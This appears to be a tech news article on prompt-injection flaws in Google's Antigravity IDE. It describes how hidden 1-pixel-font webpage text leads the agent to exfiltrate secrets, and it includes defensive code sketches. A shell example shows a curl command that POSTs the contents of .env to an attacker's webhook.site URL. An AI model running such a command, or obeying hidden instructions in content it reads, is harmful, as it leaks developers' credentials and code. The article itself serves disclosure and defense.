Google launched Antigravity IDE on November 19, positioning it as an “agent-first” development platform. Within a week, security researchers disclosed critical vulnerabilities that let attackers steal developer credentials and source code through prompt injection. Google’s response? “Intended behavior.”

Researchers at PromptArmor and Embrace The Red disclosed the flaws on November 25. The story drew 575 upvotes on Hacker News, where many commenters were shocked that Google would ship a tool with exploitable security gaps and then disclaim responsibility.

The Lethal Trifecta Design Flaw



Security researcher Simon Willison coined “lethal trifecta” to describe AI systems combining three dangerous capabilities: access to private data, exposure to untrusted content, and external communication ability. When all three exist, data exfiltration becomes nearly inevitable.
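As a rough illustration of the definition, the trifecta can be modeled as three flags on an agent. This is a minimal sketch: `AgentCapabilities` and `has_lethal_trifecta` are hypothetical names invented here, not part of any tool or of Willison's writing.

```python
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class AgentCapabilities:
    """Hypothetical capability flags for an AI agent (illustrative only)."""
    reads_private_data: bool
    ingests_untrusted_content: bool
    can_communicate_externally: bool


def has_lethal_trifecta(caps: AgentCapabilities) -> bool:
    # The trifecta is present only when all three capabilities coexist.
    return (
        caps.reads_private_data
        and caps.ingests_untrusted_content
        and caps.can_communicate_externally
    )


# An agent with codebase access, web browsing, and outbound HTTP.
agent = AgentCapabilities(True, True, True)
# The same agent with outbound communication switched off.
offline_agent = replace(agent, can_communicate_externally=False)
```

Under this model, `has_lethal_trifecta(agent)` is true, while the offline variant no longer has all three capabilities at once.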

Antigravity embodies this trifecta by design. Its agent-first architecture gives AI full codebase access, processes web content without isolation, and includes browser control for HTTP requests to allowlisted domains. Attackers hide malicious instructions in webpages using 1-pixel fonts—invisible to humans, readable to AI. When developers ask Antigravity to “analyze this guide,” hidden prompts tell the AI to find environment files and POST contents to external servers.
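To make the hidden-text trick concrete, here is a minimal Python sketch of a defensive pre-filter that flags it. It assumes the attacker sets an inline `font-size` of 1px or less. `HiddenTextFinder` and `find_hidden_text` are illustrative names, not part of Antigravity or any real scanner, and the heuristic misses other hiding techniques such as CSS classes, matching text and background colors, or off-screen positioning.

```python
import re
from html.parser import HTMLParser

# Assumption: "hidden" means an inline style with font-size <= 1px.
TINY_FONT = re.compile(r"font-size\s*:\s*(\d*\.?\d+)\s*px", re.IGNORECASE)
# Void elements never get a closing tag, so they are not tracked.
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img",
             "input", "link", "meta", "source", "track", "wbr"}


class HiddenTextFinder(HTMLParser):
    """Collects text nested inside elements styled with a tiny font."""

    def __init__(self):
        super().__init__()
        self._stack = []   # one flag per open element: tiny font or not
        self.hidden = []   # text fragments a human reader would not see

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        style = dict(attrs).get("style") or ""
        match = TINY_FONT.search(style)
        self._stack.append(bool(match) and float(match.group(1)) <= 1.0)

    def handle_endtag(self, tag):
        # Heuristic: assumes reasonably well-nested markup.
        if tag not in VOID_TAGS and self._stack:
            self._stack.pop()

    def handle_data(self, data):
        text = data.strip()
        if text and any(self._stack):
            self.hidden.append(text)


def find_hidden_text(html: str) -> list:
    finder = HiddenTextFinder()
    finder.feed(html)
    finder.close()
    return finder.hidden
```

A tool could run a check like this before handing page content to the agent and refuse, or ask the user, when it finds anything. It is a tripwire rather than a fix: the underlying problem is that untrusted content reaches an agent that can read secrets and send requests.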

Webhook.site in Default Allowlist

The most damning evidence? Webhook.site appears in Antigravity’s default Browser URL Allowlist. Webhook.site lets anyone create URLs to monitor HTTP requests—a debugging tool that becomes an exfiltration endpoint when allowlisted by default.

Competitors like Cursor and GitHub Copilot require explicit user approval for new domains. Antigravity ships with attacker-friendly endpoints pre-approved. This isn’t a sophisticated zero-day—it’s a configuration choice that nullifies network egress protections.
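A stricter egress policy is simple to express. The sketch below is one possible shape, not Antigravity's actual allowlist logic: `is_egress_allowed` and `REQUEST_CAPTURE_HOSTS` are hypothetical names, and the deny list contains only the one service named in this article.

```python
from urllib.parse import urlsplit

# Hypothetical deny list of public request-capture services. Only
# webhook.site comes from the article; a real list would be longer.
REQUEST_CAPTURE_HOSTS = {"webhook.site"}


def _matches(host: str, domain: str) -> bool:
    # Match the domain itself or any of its subdomains.
    return host == domain or host.endswith("." + domain)


def is_egress_allowed(url: str, allowlist: set) -> bool:
    """Deny by default; never allow known request-capture hosts."""
    host = (urlsplit(url).hostname or "").lower()
    if not host:
        return False
    if any(_matches(host, d) for d in REQUEST_CAPTURE_HOSTS):
        return False  # blocked even if someone added it to the allowlist
    return any(_matches(host, d) for d in allowlist)
```

The design choice that matters is the order of the checks: the deny list wins over the allowlist, so a permissive default cannot quietly re-enable an exfiltration endpoint.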

```shell
# Attack path:
# 1. Poisoned webpage with hidden instructions
# 2. AI executes without confirmation:
curl -X POST https://webhook.site/attacker-id \
  -d "$(cat .env)"
# 3. Credentials appear in attacker's dashboard
```

“Intended Behavior” Is Unacceptable

When presented with data exfiltration evidence, Google classified the behavior as “intended” and pointed to terms acknowledging “security limitations” including “data exfiltration and malicious code execution.”

Contrast this with other vendors handling prompt injection vulnerabilities in 2025:

- Microsoft patched CVE-2025-62214 in Visual Studio during November Patch Tuesday

- GitHub fixed CVE-2025-53773 in Copilot in August

- Cursor addressed CVE-2025-54135 (severity 8.6) in version 1.3

Microsoft, GitHub, and Cursor patched their vulnerabilities. Google ships them as features with ToS disclaimers. This isn’t how professional development tools work.

Dangerous Default Settings Throughout

Webhook.site isn’t isolated—it’s part of a pattern. Antigravity’s defaults prioritize agent autonomy over security:

- “Agent Decides” review policy: Operations execute without user approval

- “Terminal Command Auto Execution”: System commands run immediately

- Missing MCP human-in-the-loop: Tools invoke without verification

Enterprise security demands human-in-the-loop for consequential actions. Antigravity defaults to “AI decides everything.” Researchers found four distinct vulnerabilities. Three of them don’t require browser tools at all; they exploit the terminal access Antigravity enables by default.
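For contrast, a human-in-the-loop default can be sketched in a few lines of Python. Everything here is hypothetical and for illustration only: the `Action` type, the `LOW_RISK` set, and `run_with_approval` are assumptions, not Antigravity settings or APIs.

```python
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass(frozen=True)
class Action:
    kind: str    # e.g. "run_command", "read_file", "http_request"
    detail: str  # human-readable description shown to the user


# Hypothetical set of actions considered safe to run unattended.
# Anything not listed here requires explicit approval.
LOW_RISK = {"format_code", "search_open_files"}


def run_with_approval(
    action: Action,
    execute: Callable[[Action], str],
    ask_user: Callable[[Action], bool],
) -> Optional[str]:
    """Run the action only if it is low risk or the user approves it."""
    if action.kind not in LOW_RISK and not ask_user(action):
        return None  # declined: nothing is executed
    return execute(action)
```

Because unknown action kinds fall outside `LOW_RISK`, they require approval automatically. That is the opposite of an “Agent Decides” default, where the burden is on the user to opt in to safety.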

Enterprise Trust Crisis Deepens

Stack Overflow’s 2025 Developer Survey found trust in AI accuracy dropped from 40% to 29% year-over-year. Meanwhile, 69% of enterprises cite AI-powered data leaks as their top security concern, yet 47% lack AI-specific security controls.

AI IDEs promise productivity, but shipping known vulnerabilities with “intended behavior” disclaimers erodes the trust that enterprise adoption depends on.

What Developers Should Demand

Before adopting AI development tools, demand:

- Human-in-the-loop approval for file access, system commands, and network requests

- Strict allowlists excluding public debugging tools like webhook.site

- Transparent vulnerability disclosure followed by patches—not disclaimers

- Sandboxed agent execution isolating untrusted input from private data

Google’s response to Antigravity’s security flaws sets a dangerous precedent. If AI vendors ship exploitable systems and disclaim responsibility in fine print, enterprise software becomes a minefield. Developers deserve vendors who take security seriously.